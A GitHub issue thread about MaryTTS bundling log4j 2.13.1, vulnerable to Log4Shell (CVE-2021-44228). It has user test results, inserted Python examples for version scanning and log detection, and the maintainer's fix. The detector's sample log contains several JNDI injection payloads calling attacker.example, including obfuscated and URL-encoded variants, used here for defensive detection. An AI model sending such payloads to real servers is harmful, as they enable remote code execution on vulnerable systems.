
Current Release (v5.2) uses log4j version <= 2.14.1 making it possibly vulnerable to a remote code execution exploit

Open NoahEmbedded opened this issue 3 years ago • 4 comments

in https://github.com/marytts/marytts/blob/master/dependencies.gradle the listed version of the log4j library is 2.13.1 which is vulnerable to the exploit CVE-2021-44228 (https://nvd.nist.gov/vuln/detail/CVE-2021-44228). This exploit makes remote code execution very simple (Here is a video showing how easily the exploit can be used: https://www.youtube.com/watch?v=7qoPDq41xhQ).

I don't know in what way log4j is currently used in marytts but if it is part of the server/synthesizing process this is a safety issue that has to be attended to.

The exploit has been fixed in version 2.15.0 of log4j (I ran a quick build test with the log4j version set to 2.15.0 and didn't encounter any compatibility issues, but I haven't tested that very thoroughly).

NoahEmbedded avatar Dec 13 '21 10:12 NoahEmbedded
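Two checks a maintainer would want to run on the report above are (a) what the pinned log4j-core version in the build file leaves exposed and (b) whether the jars actually shipped in a build still contain the JNDI lookup class. The following is an added example written for this page, not code from the thread or from the MaryTTS project. The thread treats 2.15.0 as the fix for CVE-2021-44228; the later Log4j advisories (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832) moved the recommended floor to 2.17.1, which the table below encodes. Assumptions: the Gradle declaration uses the `group:name:version` shorthand (MaryTTS's `dependencies.gradle` may use a different notation), jar file names follow the `log4j-core-<version>.jar` convention, and the stand-in jars are constructed in a temporary directory so the scan runs offline.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Class inside log4j-core that implements the ${jndi:...} lookup. If it is
# present in the shipped jar, the JNDI code path is reachable from log messages.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Log4j 2 CVEs and the first 2.x main-line release that fixed each.
# Simplification (assumption): the 2.3.x / 2.12.x backport lines for old
# Java versions are not modelled; use this for Java 8+ builds only.
ADVISORIES = (
    ("CVE-2021-44228", (2, 15, 0)),
    ("CVE-2021-45046", (2, 16, 0)),
    ("CVE-2021-45105", (2, 17, 0)),
    ("CVE-2021-44832", (2, 17, 1)),
)

# Assumed "group:name:version" Gradle shorthand; adjust for map notation.
_GRADLE_DEP = re.compile(r"org\.apache\.logging\.log4j:log4j-core:([0-9][\w.\-]*)")
_JAR_NAME = re.compile(r"^log4j-core-(.+)\.jar$")


def parse_version(version: str) -> tuple:
    """'2.13.1' -> (2, 13, 1). Pre-release suffixes are dropped, so
    '2.0-beta9' compares as 2.0 (conservative: treated as older)."""
    nums = [int(n) for n in re.findall(r"\d+", version.split("-")[0])]
    return tuple(nums + [0] * (3 - len(nums)))


def open_advisories(version: str) -> list:
    """CVE ids whose fix release is newer than the given log4j-core version."""
    v = parse_version(version)
    return [cve for cve, fixed in ADVISORIES if v < fixed]


def log4j_core_versions_in_gradle(text: str) -> list:
    """All log4j-core versions pinned in a Gradle build-file excerpt."""
    return _GRADLE_DEP.findall(text)


def inspect_jar(jar_path) -> dict:
    """Version from the file name plus whether JndiLookup.class is shipped."""
    path = Path(jar_path)
    m = _JAR_NAME.match(path.name)
    version = m.group(1) if m else None
    with zipfile.ZipFile(path) as zf:
        has_jndi = JNDI_LOOKUP_CLASS in zf.namelist()
    return {
        "jar": path.name,
        "version": version,
        "jndi_lookup_present": has_jndi,
        "open_advisories": open_advisories(version) if version else [],
    }


def make_fake_jar(directory, version: str, with_jndi_lookup: bool = True) -> Path:
    """Constructed stand-in for a log4j-core jar (empty class entries, not
    real bytecode) so the scan can be exercised offline."""
    path = Path(directory) / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")
    return path


def scan_directory(directory) -> list:
    return [inspect_jar(p) for p in sorted(Path(directory).glob("log4j-core-*.jar"))]


def demo_scan() -> list:
    """Build three constructed jars (the version the issue reports, the
    version it proposes, and the final fixed release) and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        for v in ("2.13.1", "2.15.0", "2.17.1"):
            make_fake_jar(tmp, v)
        return scan_directory(tmp)


if __name__ == "__main__":
    # Constructed build-file excerpt mirroring the version the issue reports.
    gradle_snippet = "implementation 'org.apache.logging.log4j:log4j-core:2.13.1'"
    for v in log4j_core_versions_in_gradle(gradle_snippet):
        print(f"build file pins log4j-core {v}; open advisories: {open_advisories(v)}")
    for report in demo_scan():
        print(report)
```

Point the scanner at the directory a `./gradlew build` or `installDist` populates with runtime jars; a jar whose version is at or above 2.17.1 reports no open advisories even though `JndiLookup.class` is still present, because from 2.16.0 onward JNDI lookups are disabled by default in log4j.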

It is indeed used in the server process. I looked at the code though and I found that the logger mostly logs because of a call of the form logger.info("xyz:" + message) which is (luckily) NOT a call to logger.info("xyz {}", message) which would be vulnerable through the message argument.

There are one or two statements that use a format argument, but those seem, after some consideration, not to be injectable from the server side (I may be wrong though, but I did not manage to inject any of those since they are mostly responsible for logging single non-pronounceable chars, which is not enough to inject a whole string).

Nonetheless log4j should be upgraded as fast as possible to be on the safe side.

If you have already got marytts working with log4j 2.15.0, maybe you could make a fork and open a pull request or link your fork here.

Thank you for bringing attention to this issue!

Hypercookie avatar Dec 16 '21 08:12 Hypercookie

https://github.com/fullhunt/log4j-scan

does also not find any attack vector on my instance, which is no verification but a good sign.

Hypercookie avatar Dec 16 '21 09:12 Hypercookie

I fiddled around with this testing website here: https://log4shell.huntress.com/. It gives you a string that can be used as input for the application you want to test and if the exploit works it shows the IP of the vulnerable system and a timestamp of the test. I ran two series of tests (one with the old and one with the new version):

  1. using log4j-core 2.13.1 (version used in current master); build commands: "./gradlew clean" followed by "./gradlew build"
     1.1 using run command "./gradlew run": no vulnerability detected
     1.2 using run command "./gradlew run -Dlog4j.logger.marytts='INFO'": vulnerability detected (testing website showed that the test string had been used by the machine the server was running on)
     1.3 using run command "./gradlew run -Dlog4j.logger.marytts='DEBUG'": vulnerability detected
     1.4 using run command "./gradlew run -info": vulnerability detected
     1.5 using run command "./gradlew run -debug": vulnerability detected
  2. using log4j-core 2.15.0 (simply changed the version in the "dependencies.gradle" file and cleaned + rebuilt); build commands: "./gradlew clean" followed by "./gradlew build"
     2.1 using run command "./gradlew run": no vulnerability detected
     2.2 using run command "./gradlew run -Dlog4j.logger.marytts='INFO'": no vulnerability detected
     2.3 using run command "./gradlew run -Dlog4j.logger.marytts='DEBUG'": no vulnerability detected
     2.4 using run command "./gradlew run -info": no vulnerability detected
     2.5 using run command "./gradlew run -debug": no vulnerability detected

  So as it seems the new version fixes the exploit. I haven't forked the project yet but only downloaded the master branch as a zip to play around with it for a bit.

NoahEmbedded avatar Dec 16 '21 21:12 NoahEmbedded
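The tests above (the Huntress canary string, and log4j-scan two comments earlier) tell you whether a given deployment is exploitable; the complementary question for an operator is whether anyone has already sent Log4Shell probes to the server. Scanners and attackers routinely hide the `jndi` keyword behind nested lookups such as `${${lower:j}ndi:...}` or `${${::-j}${::-n}...}`, so a plain substring match on `${jndi:` misses most of them. The following is an added example written for this page, not code from the thread or from MaryTTS: it URL-decodes each log line, folds the obfuscation lookups (`lower`, `upper`, and the `${name:-default}` fallback syntax) the way log4j would evaluate them, and only then looks for a JNDI lookup. The log lines are constructed for the example and do not reproduce MaryTTS's real log format.

```python
import re
from urllib.parse import unquote

# An innermost lookup: "${...}" whose body contains no further "${" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately hunting for once obfuscation has been folded away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one innermost log4j-style lookup body to the text it would
    contribute, covering the lookups commonly used to hide 'jndi'.
    Anything else (including jndi itself) is returned unchanged."""
    if ":-" in body:
        # Default-value syntax ${name:-default}: an undefined lookup such as
        # ${::-j} or ${env:NOPE:-j} evaluates to the default text.
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep:
        name = name.strip().lower()
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
    return "${" + body + "}"


def normalize_lookups(text: str, max_passes: int = 20) -> str:
    """Fold nested obfuscation lookups from the inside out until nothing
    changes; max_passes bounds work on pathological input."""
    text = unquote(text)
    for _ in range(max_passes):
        changed = False

        def repl(m):
            nonlocal changed
            out = _resolve(m.group(1))
            if out != m.group(0):
                changed = True
            return out

        text = _INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def contains_jndi_lookup(text: str) -> bool:
    return _JNDI.search(normalize_lookups(text)) is not None


def scan_log(lines) -> list:
    """(line number, line) for every line carrying a JNDI lookup."""
    return [(i, line) for i, line in enumerate(lines, 1) if contains_jndi_lookup(line)]


# Constructed sample log lines (not real MaryTTS output): one benign request,
# five probe variants, and one harmless non-jndi lookup.
SAMPLE_LOG = [
    "GET /process?INPUT_TEXT=Hello+world&OUTPUT_TYPE=AUDIO 200",
    "GET /process?INPUT_TEXT=${jndi:ldap://attacker.example/a} 200",
    "User-Agent: ${${lower:j}ndi:ldap://attacker.example/a}",
    "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",
    "X-Api-Version: ${${env:NaN:-j}ndi${env:NaN:-:}ldap://attacker.example/a}",
    "GET /process?INPUT_TEXT=%24%7Bjndi%3Aldap%3A//attacker.example/a%7D 200",
    "GET /process?INPUT_TEXT=${date:yyyy-MM-dd}+is+today 200",
]

if __name__ == "__main__":
    for lineno, line in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {normalize_lookups(line)}")
```

This is a detection heuristic, not a parser of log4j's full lookup grammar: it handles the `lower`, `upper` and default-value tricks seen in the wild, treats every other lookup as opaque, and decodes one layer of URL encoding. A hit means a probe reached a string that the server might have logged; whether it was actually interpolated still depends on the log4j version and the logging configuration, which is exactly what the INFO/DEBUG runs above were exercising.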

Thanks for your patience here!

I finally got around to addressing this as part of the v5.2.1 maintenance release (see the POM).

Will fix it in the master branch soon.

psibre avatar May 25 '22 12:05 psibre